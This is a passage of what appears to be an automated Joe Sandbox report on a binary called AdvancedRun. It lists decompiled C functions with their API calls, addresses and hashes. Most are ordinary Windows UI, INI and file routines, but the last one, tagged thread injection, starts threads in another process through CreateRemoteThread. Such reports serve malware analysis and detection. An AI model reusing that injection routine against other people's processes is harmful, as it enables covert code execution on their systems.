				signed int _t37;

				_t30 = __ecx;
				E0040B550(0x4004, __ecx);
				_push(0x4000);
				_push(0);
				_v16392 = 0;
				_t34 = _t30;
				_push( &_v16390);
				if(_a4 == 0) {
					memset();
					GetPrivateProfileStringW(_a8, _a12, 0x40c4e8,  &_v16392, 0x2000, _a20);
					asm("sbb esi, esi");
					_t37 =  ~_t36;
					E004051B8( &_v16392, _t34, _a16);
				} else {
					memset();
					E0040512F(_a16,  *_t34,  &_v16392);
					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
				}
				return _t37;
			}










                                                                  0x00409ddc
                                                                  0x00409de4
                                                                  0x00409df0
                                                                  0x00409df5
                                                                  0x00409df6
                                                                  0x00409e03
                                                                  0x00409e05
                                                                  0x00409e06
                                                                  0x00409e3b
                                                                  0x00409e5d
                                                                  0x00409e6a
                                                                  0x00409e73
                                                                  0x00409e75
                                                                  0x00409e08
                                                                  0x00409e08
                                                                  0x00409e19
                                                                  0x00409e37
                                                                  0x00409e37
                                                                  0x00409e81

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00409E08
                                                                    • Part of subcall function 0040512F: _snwprintf.MSVCRT ref: 00405174
                                                                    • Part of subcall function 0040512F: memcpy.MSVCRT ref: 00405184
                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409E31
                                                                  • memset.MSVCRT ref: 00409E3B
                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,0040C4E8,?,00002000,?), ref: 00409E5D
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                  • String ID:
                                                                  • API String ID: 1127616056-0
                                                                  • Opcode ID: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                  • Instruction ID: edc1d82326a177a4eed1c31c26edb3d60bf211bedf20f6070ddf32627235df0d
                                                                  • Opcode Fuzzy Hash: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                  • Instruction Fuzzy Hash: A9117071500119AFDF11AF64DD06E9E7BA9EF04704F1000BAFB05B6191E7319E608BAD
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040ACFC, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 37%
                                                                  			E0040ACFC(wchar_t* __esi, char _a4, intOrPtr _a8) {
				void* _v8;
				wchar_t* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				long _v564;
				char* _t18;
				char* _t22;
				wchar_t* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr _t30;
				void* _t35;
				char* _t36;

				_t18 =  &_v8;
				_t30 = 0;
				__imp__SHGetMalloc(_t18);
				if(_t18 >= 0) {
					_v40 = _a4;
					_v28 = _a8;
					_t22 =  &_v40;
					_v36 = 0;
					_v32 = 0;
					_v24 = 4;
					_v20 = E0040AC81;
					_v16 = __esi;
					__imp__SHBrowseForFolderW(_t22, _t35);
					_t36 = _t22;
					if(_t36 != 0) {
						_t23 =  &_v564;
						__imp__SHGetPathFromIDListW(_t36, _t23);
						if(_t23 != 0) {
							_t30 = 1;
							wcscpy(__esi,  &_v564);
						}
						_t24 = _v8;
						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
						_t26 = _v8;
						 *((intOrPtr*)( *_t26 + 8))(_t26);
					}
				}
				return _t30;
			}




















                                                                  0x0040ad06
                                                                  0x0040ad0a
                                                                  0x0040ad0c
                                                                  0x0040ad14
                                                                  0x0040ad19
                                                                  0x0040ad1f
                                                                  0x0040ad23
                                                                  0x0040ad27
                                                                  0x0040ad2a
                                                                  0x0040ad2d
                                                                  0x0040ad34
                                                                  0x0040ad3b
                                                                  0x0040ad3e
                                                                  0x0040ad44
                                                                  0x0040ad48
                                                                  0x0040ad4a
                                                                  0x0040ad52
                                                                  0x0040ad5a
                                                                  0x0040ad64
                                                                  0x0040ad65
                                                                  0x0040ad6b
                                                                  0x0040ad6c
                                                                  0x0040ad73
                                                                  0x0040ad76
                                                                  0x0040ad7c
                                                                  0x0040ad7c
                                                                  0x0040ad7f
                                                                  0x0040ad84

                                                                  APIs
                                                                  • SHGetMalloc.SHELL32(?), ref: 0040AD0C
                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 0040AD3E
                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AD52
                                                                  • wcscpy.MSVCRT ref: 0040AD65
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                  • String ID:
                                                                  • API String ID: 3917621476-0
                                                                  • Opcode ID: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                  • Instruction ID: e4c3f7e47c5e56e8be22c5f757262c1ae757d72ab7f138bc7c026954c7aa5c2b
                                                                  • Opcode Fuzzy Hash: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                  • Instruction Fuzzy Hash: B011FAB5900208EFDB10EFA9D9889AEB7F8FF48300F10416AE905E7240D738DA05CFA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00404A44, Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				long _v8;
				long _v12;
				long _t13;
				void* _t14;
				struct HWND__* _t24;

				_t24 = GetDlgItem(_a4, _a8);
				_t13 = SendMessageW(_t24, 0x146, 0, 0);
				_v12 = _t13;
				_v8 = 0;
				if(_t13 <= 0) {
					L3:
					_t14 = 0;
				} else {
					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
						_v8 = _v8 + 1;
						if(_v8 < _v12) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					SendMessageW(_t24, 0x14e, _v8, 0);
					_t14 = 1;
				}
				L4:
				return _t14;
			}








                                                                  0x00404a62
                                                                  0x00404a6a
                                                                  0x00404a6e
                                                                  0x00404a71
                                                                  0x00404a74
                                                                  0x00404a92
                                                                  0x00404a92
                                                                  0x00404a76
                                                                  0x00404a76
                                                                  0x00404a87
                                                                  0x00404a90
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00404a90
                                                                  0x00404aa3
                                                                  0x00404aa7
                                                                  0x00404aa7
                                                                  0x00404a94
                                                                  0x00404a98

                                                                  APIs
                                                                  • GetDlgItem.USER32 ref: 00404A52
                                                                  • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
                                                                  • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
                                                                  • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Item
                                                                  • String ID:
                                                                  • API String ID: 3888421826-0
                                                                  • Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                  • Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
                                                                  • Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                  • Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004072D8, Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 93%
                                                                  			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
				long _v8;
				void _v8199;
				char _v8200;

				E0040B550(0x2004, __ecx);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}






                                                                  0x004072e0
                                                                  0x004072f7
                                                                  0x004072fd
                                                                  0x00407316
                                                                  0x00407342

                                                                  APIs
                                                                  • memset.MSVCRT ref: 004072FD
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
                                                                  • strlen.MSVCRT ref: 00407328
                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                  • String ID:
                                                                  • API String ID: 2754987064-0
                                                                  • Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                  • Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
                                                                  • Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                  • Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00408DC8, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E00408DC8(void** __eax, struct HWND__* _a4) {
				int _t7;
				void** _t11;

				_t11 = __eax;
				if( *0x4101b4 == 0) {
					memcpy(0x40f5c8,  *__eax, 0x50);
					memcpy(0x40f2f8,  *(_t11 + 4), 0x2cc);
					 *0x4101b4 = 1;
					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E00408ADB, 0);
					 *0x4101b4 =  *0x4101b4 & 0x00000000;
					 *0x40f2f4 = _t7;
					return 1;
				} else {
					return 1;
				}
			}





                                                                  0x00408dd0
                                                                  0x00408dd2
                                                                  0x00408de2
                                                                  0x00408df4
                                                                  0x00408e01
                                                                  0x00408e1b
                                                                  0x00408e21
                                                                  0x00408e28
                                                                  0x00408e30
                                                                  0x00408dd4
                                                                  0x00408dd8
                                                                  0x00408dd8

                                                                  APIs
                                                                  • memcpy.MSVCRT ref: 00408DE2
                                                                  • memcpy.MSVCRT ref: 00408DF4
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00408E07
                                                                  • DialogBoxParamW.USER32(00000000,0000006B,?,Function_00008ADB,00000000), ref: 00408E1B
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy$DialogHandleModuleParam
                                                                  • String ID:
                                                                  • API String ID: 1386444988-0
                                                                  • Opcode ID: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                  • Instruction ID: 2efff09082e6186f10957894d43819ba35d003f4fc085d6afb87634920226402
                                                                  • Opcode Fuzzy Hash: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                  • Instruction Fuzzy Hash: FAF08231695310BBD7206BA4BE0AB473AA0D700B16F2484BEF241B54E0C7FA04559BDC
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004050E1, Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E004050E1(wchar_t* __edi, wchar_t* _a4) {
				int _t10;
				int _t12;
				void* _t23;
				wchar_t* _t24;
				signed int _t25;

				_t24 = __edi;
				_t25 = wcslen(__edi);
				_t10 = wcslen(_a4);
				_t23 = _t10 + _t25;
				if(_t23 >= 0x3ff) {
					_t12 = _t10 - _t23 + 0x3ff;
					if(_t12 > 0) {
						wcsncat(__edi + _t25 * 2, _a4, _t12);
					}
				} else {
					wcscat(__edi + _t25 * 2, _a4);
				}
				return _t24;
			}








                                                                  0x004050e1
                                                                  0x004050ec
                                                                  0x004050ee
                                                                  0x004050f5
                                                                  0x004050ff
                                                                  0x00405114
                                                                  0x00405118
                                                                  0x00405123
                                                                  0x00405128
                                                                  0x00405101
                                                                  0x00405109
                                                                  0x0040510f
                                                                  0x0040512e

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: wcslen$wcscatwcsncat
                                                                  • String ID:
                                                                  • API String ID: 291873006-0
                                                                  • Opcode ID: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                  • Instruction ID: d151cadb35ebc04527c95d650d15a6f00d765f1fde14687ca002c1c28d544fc6
                                                                  • Opcode Fuzzy Hash: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                  • Instruction Fuzzy Hash: 3CE0EC36908703AECB042625AC45C6F375DEF84368B50843FF410E6192EF3DD51556DD
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00402DDD, Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E00402DDD(struct HWND__* __eax, void* __ecx) {
				void* __edi;
				void* __esi;
				struct HWND__* _t11;
				struct HWND__* _t14;
				struct HWND__* _t15;
				void* _t16;

				_t14 = __eax;
				_t16 = __ecx;
				 *((intOrPtr*)(__ecx + 0x10)) = __eax;
				GetClientRect(__eax, __ecx + 0xa14);
				 *(_t16 + 0xa24) =  *(_t16 + 0xa24) & 0x00000000;
				_t15 = GetWindow(GetWindow(_t14, 5), 0);
				do {
					E00402D99(_t15, _t16);
					_t11 = GetWindow(_t15, 2);
					_t15 = _t11;
				} while (_t15 != 0);
				return _t11;
			}









                                                                  0x00402de0
                                                                  0x00402de2
                                                                  0x00402dec
                                                                  0x00402def
                                                                  0x00402dfb
                                                                  0x00402e0c
                                                                  0x00402e0e
                                                                  0x00402e0e
                                                                  0x00402e16
                                                                  0x00402e18
                                                                  0x00402e1a
                                                                  0x00402e21

                                                                  APIs
                                                                  • GetClientRect.USER32 ref: 00402DEF
                                                                  • GetWindow.USER32(?,00000005), ref: 00402E07
                                                                  • GetWindow.USER32(00000000), ref: 00402E0A
                                                                    • Part of subcall function 00402D99: GetWindowRect.USER32 ref: 00402DA8
                                                                    • Part of subcall function 00402D99: MapWindowPoints.USER32 ref: 00402DC3
                                                                  • GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Rect$ClientPoints
                                                                  • String ID:
                                                                  • API String ID: 4235085887-0
                                                                  • Opcode ID: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                  • Instruction ID: 77c271d885eafffee951e9f606c1c6e1ef1898ae553cc6e200c9330dee891b18
                                                                  • Opcode Fuzzy Hash: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                  • Instruction Fuzzy Hash: B8E092722407006BE22197398DC9FABB2EC9FC9761F11053EF504E7280DBB8DC014669
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040B6A6, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 72%
                                                                  			E0040B6A6() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x41c458;
				if(_t1 != 0) {
					_push(_t1);
					L0040B272();
				}
				_t2 =  *0x41c460;
				if(_t2 != 0) {
					_push(_t2);
					L0040B272();
				}
				_t3 =  *0x41c45c;
				if(_t3 != 0) {
					_push(_t3);
					L0040B272();
				}
				_t4 =  *0x41c464;
				if(_t4 != 0) {
					_push(_t4);
					L0040B272();
					return _t4;
				}
				return _t4;
			}







                                                                  0x0040b6a6
                                                                  0x0040b6ad
                                                                  0x0040b6af
                                                                  0x0040b6b0
                                                                  0x0040b6b5
                                                                  0x0040b6b6
                                                                  0x0040b6bd
                                                                  0x0040b6bf
                                                                  0x0040b6c0
                                                                  0x0040b6c5
                                                                  0x0040b6c6
                                                                  0x0040b6cd
                                                                  0x0040b6cf
                                                                  0x0040b6d0
                                                                  0x0040b6d5
                                                                  0x0040b6d6
                                                                  0x0040b6dd
                                                                  0x0040b6df
                                                                  0x0040b6e0
                                                                  0x00000000
                                                                  0x0040b6e5
                                                                  0x0040b6e6

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@
                                                                  • String ID:
                                                                  • API String ID: 613200358-0
                                                                  • Opcode ID: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                  • Instruction ID: 3bd5cb9a150004800b4bedd87e83f43d671674f7d7a0a5890c52a9af046e0154
                                                                  • Opcode Fuzzy Hash: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                  • Instruction Fuzzy Hash: 96E00261B8820196DD249A7AACD5D6B239C9A05794314847EF804E72E5DF39D44045ED
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00407362, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 75%
                                                                  			E00407362(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				wchar_t* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				void* __edi;
				signed int _t39;
				wchar_t* _t41;
				signed int _t45;
				signed int _t48;
				wchar_t* _t53;
				wchar_t* _t62;
				void* _t66;
				intOrPtr* _t68;
				void* _t70;
				wchar_t* _t75;
				wchar_t* _t79;

				_t66 = __ebx;
				_t75 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t39 =  *( *((intOrPtr*)(_t66 + 0x30)) + _v8 * 4);
						_t68 = _a8;
						if(_t68 != _t75) {
							_t79 =  *((intOrPtr*)( *_t68))(_t39,  *((intOrPtr*)(_t66 + 0x60)));
						} else {
							_t79 =  *( *((intOrPtr*)(_t66 + 0x2d4)) + 0x10 + _t39 * 0x14);
						}
						_t41 = wcschr(_t79, 0x2c);
						_pop(_t70);
						if(_t41 != 0) {
							L8:
							_v20 = _t75;
							_v28 = _t75;
							_v36 = _t75;
							_v24 = 0x100;
							_v32 = 1;
							_v16 = 0x22;
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							while(1) {
								_t45 =  *_t79 & 0x0000ffff;
								__eflags = _t45;
								_v12 = _t45;
								_t77 =  &_v36;
								if(__eflags == 0) {
									break;
								}
								__eflags = _t45 - 0x22;
								if(__eflags != 0) {
									_push( &_v12);
									_t48 = 1;
									__eflags = 1;
								} else {
									_push(L"\"\"");
									_t48 = _t45 | 0xffffffff;
								}
								E0040565D(_t48, _t70, _t77, __eflags);
								_t79 =  &(_t79[0]);
								__eflags = _t79;
							}
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							_t53 = _v20;
							__eflags = _t53;
							if(_t53 == 0) {
								_t53 = 0x40c4e8;
							}
							E004055D1(E00407343(_t66, _a4, _t53),  &_v36);
							_t75 = 0;
							__eflags = 0;
						} else {
							_t62 = wcschr(_t79, 0x22);
							_pop(_t70);
							if(_t62 != 0) {
								goto L8;
							} else {
								E00407343(_t66, _a4, _t79);
							}
						}
						if(_v8 <  *((intOrPtr*)(_t66 + 0x2c)) - 1) {
							E00407343(_t66, _a4, ",");
						}
						_v8 = _v8 + 1;
					} while (_v8 <  *((intOrPtr*)(_t66 + 0x2c)));
				}
				return E00407343(_t66, _a4, L"\r\n");
			}























                                                                  0x00407362
                                                                  0x00407369
                                                                  0x0040736e
                                                                  0x00407371
                                                                  0x00407378
                                                                  0x0040737e
                                                                  0x00407381
                                                                  0x00407386
                                                                  0x0040739f
                                                                  0x00407388
                                                                  0x00407391
                                                                  0x00407391
                                                                  0x004073a4
                                                                  0x004073ac
                                                                  0x004073ad
                                                                  0x004073cd
                                                                  0x004073d0
                                                                  0x004073d3
                                                                  0x004073d6
                                                                  0x004073e0
                                                                  0x004073e7
                                                                  0x004073ee
                                                                  0x004073f5
                                                                  0x0040741a
                                                                  0x0040741a
                                                                  0x0040741d
                                                                  0x00407420
                                                                  0x00407423
                                                                  0x00407426
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004073fc
                                                                  0x00407400
                                                                  0x0040740f
                                                                  0x00407412
                                                                  0x00407412
                                                                  0x00407402
                                                                  0x00407402
                                                                  0x00407407
                                                                  0x00407407
                                                                  0x00407413
                                                                  0x00407419
                                                                  0x00407419
                                                                  0x00407419
                                                                  0x0040742f
                                                                  0x00407434
                                                                  0x00407437
                                                                  0x00407439
                                                                  0x0040743b
                                                                  0x0040743b
                                                                  0x0040744e
                                                                  0x00407453
                                                                  0x00407453
                                                                  0x004073af
                                                                  0x004073b2
                                                                  0x004073ba
                                                                  0x004073bb
                                                                  0x00000000
                                                                  0x004073bd
                                                                  0x004073c3
                                                                  0x004073c3
                                                                  0x004073bb
                                                                  0x0040745c
                                                                  0x00407468
                                                                  0x00407468
                                                                  0x0040746d
                                                                  0x00407473
                                                                  0x0040747c
                                                                  0x0040748e

                                                                  APIs
                                                                  • wcschr.MSVCRT ref: 004073A4
                                                                  • wcschr.MSVCRT ref: 004073B2
                                                                    • Part of subcall function 0040565D: wcslen.MSVCRT ref: 00405679
                                                                    • Part of subcall function 0040565D: memcpy.MSVCRT ref: 0040569D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: wcschr$memcpywcslen
                                                                  • String ID: "
                                                                  • API String ID: 1983396471-123907689
                                                                  • Opcode ID: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                  • Instruction ID: 00b3f0686b04e7c82e40785714242b478475f00d1c6093d835cc4068bab83974
                                                                  • Opcode Fuzzy Hash: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                  • Instruction Fuzzy Hash: 4E315F31E04208ABDF10EFA5C8819AE7BB9EF54314F20457BEC50B72C2D778AA41DB59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040A272, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70threadinjectionCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 64%
                                                                  			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
				void* _v8;
				char _v12;
				char* _v20;
				long _v24;
				intOrPtr _v28;
				char* _v36;
				signed int _v40;
				void _v44;
				char _v48;
				char _v52;
				struct _OSVERSIONINFOW _v328;
				void* __esi;
				signed int _t40;
				intOrPtr* _t44;
				void* _t49;
				struct HINSTANCE__** _t54;
				signed int _t55;

				_t54 = __eax;
				_v328.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v328);
				if(_v328.dwMajorVersion < 6) {
					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
				}
				E0040A1EF(_t54);
				_t44 =  *((intOrPtr*)(_t54 + 4));
				if(_t44 != 0) {
					_t55 = 8;
					memset( &_v44, 0, _t55 << 2);
					_v12 = 0;
					asm("stosd");
					_v36 =  &_v12;
					_v20 =  &_v52;
					_v48 = 0x24;
					_v44 = 0x10003;
					_v40 = _t55;
					_v28 = 0x10004;
					_v24 = 4;
					_a16 = 0;
					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
					asm("sbb eax, eax");
					return  !( ~_t40) & _a16;
				}
				return 0;
			}




















                                                                  0x0040a27d
                                                                  0x0040a286
                                                                  0x0040a290
                                                                  0x0040a29d
                                                                  0x00000000
                                                                  0x0040a32f
                                                                  0x0040a29f
                                                                  0x0040a2a4
                                                                  0x0040a2ad
                                                                  0x0040a2b6
                                                                  0x0040a2bc
                                                                  0x0040a2be
                                                                  0x0040a2c4
